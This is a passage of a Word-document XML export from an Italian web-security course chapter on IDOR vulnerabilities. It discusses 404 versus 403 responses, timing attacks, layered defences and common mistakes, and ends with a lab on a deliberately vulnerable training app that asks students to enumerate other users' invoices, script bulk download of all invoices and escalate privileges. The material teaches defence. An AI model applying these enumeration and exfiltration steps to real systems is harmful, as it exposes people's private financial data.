        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rivela l’esistenza di risorse, abilita tecniche di enumerazione anche se non ottengono i dati.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="285"/>
    <w:bookmarkStart w:id="286" w:name="la-pratica-industriale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La pratica industriale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La maggior parte dei team sceglie:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">404 per dati confidenziali sensibili al solo fatto di esistere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: fatture finanziarie, documenti medici, profili privati. Non vogliamo nemmeno che l’attaccante sappia che esistono.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1110"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">403 quando l’esistenza della risorsa è già pubblica o non sensibile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una pagina di amministrazione che esiste sempre allo stesso URL, una API pubblica che richiede autorizzazione per leggere certi campi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ho scelto 404 perché il fatto che esista la fattura n. 3 di un altro è esso stesso un’informazione che non vogliamo rivelare.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="286"/>
    <w:bookmarkStart w:id="287" w:name="punto-delicato-timing-attacks"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Punto delicato: timing attacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anche se restituisci sempre 404, attento al</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">tempo di risposta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se la query di verifica esistenza è veloce (10ms) e quella che legge i dati è più lenta (50ms), un attaccante può misurare il tempo della risposta e dedurre se la risorsa esiste (50ms) o no (10ms). Questa è la categoria dei</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">timing attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La difesa è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">uguagliare i tempi di risposta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: rispondere sempre dopo lo stesso tempo, indipendentemente dal caso. È una difesa avanzata, raramente necessaria nelle applicazioni medie, ma da conoscere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="287"/>
    <w:bookmarkEnd w:id="288"/>
    <w:bookmarkStart w:id="294" w:name="difese-aggiuntive-in-profondità-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="520" w:name="sec_6_10"/>
      <w:r>
        <w:t xml:space="preserve">6.10 Difese aggiuntive in profondità</w:t>
      </w:r>
      <w:bookmarkEnd w:id="520"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ricapitoliamo le difese complementari (alcune già accennate).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="289" w:name="identificatori-non-sequenziali-uuid-v4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Identificatori non sequenziali (UUID v4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sostituire ID numerici sequenziali (1, 2, 3…) con UUID casuali (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">8e7a13f4-2c5d-4a91-b3e6-7f2c1d9a8b5e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Non sostituisce il controllo di autorizzazione, ma rende</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">molto più difficile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’enumerazione automatica.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="289"/>
    <w:bookmarkStart w:id="290" w:name="rate-limiting-sugli-endpoint-sensibili"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Rate limiting sugli endpoint sensibili</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chiunque interroghi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/fattura/&lt;id&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.000 volte al secondo è sospetto. Aggiungere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">flask-limiter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o un proxy con rate limiting blocca l’esfiltrazione automatica anche se l’IDOR esistesse.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="290"/>
    <w:bookmarkStart w:id="291" w:name="X09897a3d78637cdd88a2be2f8862af6e77a44da"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Audit log delle azioni autorizzate e negate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni richiesta autorizzata o negata viene registrata: timestamp, utente, IP, risorsa richiesta, esito. Permette di rilevare pattern anomali (un utente che improvvisamente accede a 500 fatture in 10 secondi) e di ricostruire eventi a posteriori.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="291"/>
    <w:bookmarkStart w:id="292" w:name="test-di-sicurezza-specifici"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Test di sicurezza specifici</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I test funzionali (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Mario vede le sue fatture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) non rilevano IDOR. Servono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">test di sicurezza dedicati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che simulino:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Mario tenta di vedere fatture di altri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Utente non admin tenta di accedere a endpoint admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Utente di un’organizzazione tenta di accedere a dati di un’altra organizzazione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questi test devono far parte della suite automatica di CI/CD, eseguiti a ogni commit.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="292"/>
    <w:bookmarkStart w:id="293" w:name="X1665fcbfdfbe4263be4bba6bd13f3586f5a813e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Code review focalizzato sui controlli di autorizzazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In team maturi esiste una checklist di revisione: per ogni nuovo endpoint, il revisore deve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dimostrare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che il controllo di autorizzazione esiste. Il revisore non si fida del programmatore, controlla esplicitamente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="293"/>
    <w:bookmarkEnd w:id="294"/>
    <w:bookmarkStart w:id="295" w:name="errori-comuni-in-produzione"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="521" w:name="sec_6_11"/>
      <w:r>
        <w:t xml:space="preserve">6.11 Errori comuni in produzione</w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>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t xml:space="preserve">Controllo solo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">se loggato</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">senza ownership</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDOR completo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aggiungere filtro proprietà nella query o controllo esplicito</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Controllo nel frontend (JavaScript), non nel backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Aggirabile con curl/Postman in 5 secondi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tutti i controlli</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">server-side</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, sempre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Decoratore</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@login_required</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">ma niente verifica risorsa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Decoratori specifici per le risorse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ID utente preso dal body invece che dalla sessione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mass assignment, IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sempre dalla sessione (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">session["utente_id"]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Endpoint admin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">“</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">nascosti</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">senza vera protezione</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Brute-force degli URL nascosti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vera autorizzazione, non sicurezza per oscurità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UUID v1 (con timestamp) o v4 ma deboli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Enumerazione tramite timestamp/struttura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">UUID v4 da</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">uuid.uuid4()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Python) o equivalenti</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">200 OK con body vuoto al posto di 404</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conferma esistenza per timing/comportamento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Status code appropriato e tempi uniformi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pannello admin separato ma con stesso DB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Compromissione del frontend = compromissione admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Domini, autenticazioni e policy separati</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="295"/>
    <w:bookmarkStart w:id="300" w:name="X144264a46896e21afde994cf2ea9ccc9446413b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="522" w:name="sec_6_12"/>
      <w:r>
        <w:t xml:space="preserve">6.12 Laboratorio finale: IDOR su BancaPiccola completa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="522"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ℹ️ Come per il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, fa riferimento al repository</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del corso (</w:t>
      </w:r>
      <w:hyperlink r:id="rId39">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/ss4i/BancaPiccola</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). Se non è ancora rilasciato, ripeti gli esercizi sul tuo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">esteso.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="296" w:name="setup-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd corso-sicurezza/BancaPiccola/BancaPiccola-vuln</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="296"/>
    <w:bookmarkStart w:id="297" w:name="obiettivi"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Su</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BancaPiccola-vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lettura non autorizzata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: come utente loggato (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), accedere a tutte le fatture di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">giulia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">luca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Documenta gli URL utilizzati.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esfiltrazione automatica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: scrivi uno script Python (basato su quello del </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec_6_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">§6.5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) che scarica TUTTE le fatture del database e le salva in un file CSV. Calcola il totale dei movimenti per ogni utente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1111"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica non autorizzata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: trova un endpoint di modifica del profilo che permetta a un utente di modificare i dati di un altro utente. Usa REST Client o curl per dimostrare l’attacco. Tentativo bonus: promuoverti ad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
